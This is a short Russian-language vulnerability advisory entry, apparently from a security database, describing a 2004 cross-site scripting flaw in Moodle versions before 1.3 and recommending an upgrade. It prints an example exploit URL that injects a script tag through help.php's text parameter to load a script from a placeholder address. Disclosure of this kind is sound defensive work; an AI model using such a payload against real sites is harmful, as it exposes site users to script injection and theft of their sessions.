Межсайтовый скриптинг в Moodle

Дата публикации:
02.05.2004
Всего просмотров:
865
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Moodle 1.2.x
Уязвимые версии: Moodle до версии 1.3

Описание: Уязвимость обнаружена в Moodle. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://{some_moodle_site}/help.php?text=<script src={url_to_script_to_execute}></script>

URL производителя: http://www.moodle.org/

Решение:Установите обновленную версию программы: http://moodle.org/mod/resource/view.php?id=8

Ссылки: Cross Site Scripting in Moodle < 1.3

или введите имя

CAPTCHA